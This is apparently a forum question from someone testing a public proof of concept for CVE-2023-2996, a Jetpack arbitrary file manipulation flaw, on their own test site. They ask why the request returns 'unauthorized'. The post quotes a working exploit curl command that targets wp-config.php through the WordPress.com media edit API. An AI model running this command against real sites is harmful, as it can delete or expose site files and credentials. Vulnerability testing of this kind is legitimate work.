I am running the Proof of Concept (POC) on a test site for vulnerability CVE-2023-2996 Jetpack < 12.1.1 – Author+ Arbitrary File Manipulation via API.
This is what the WPSCAN report says if you want to read and understand the vulnerability: WPSCAN Report
Description:
The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieving Remote Code Execution via Phar deserialization.
Proof of Concept:
curl --json '{ "media": {"tmp_name": "/WP_CONTENT_PATH/wp-config.php", "name": "test.txt"} }' https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit
Where BLOG_ID is the site’s Jetpack blog ID.
For this proof of concept, I have a test site on Azure’s app services, with Jetpack connected in a vulnerable version, and I have my blog_id. Additionally, I have my site on a custom domain so that my Jetpack site is not in staging mode. If the site is in staging mode, API calls are disabled. I have also created a user to whom I assigned author permissions to perform the POC. However, what I don’t understand is how to execute the POC. When I open the terminal and directly run that POC with my blog_id, I receive the message:
{"error":"unauthorized","message":"This endpoint does not allow unauthorized access."}
But I believe I am doing something wrong because I assume I should put some token in the curl
command to be recognized as an author, as so far I am just opening the terminal and running the POC directly. I would greatly appreciate it if someone could explain how to solve this problem.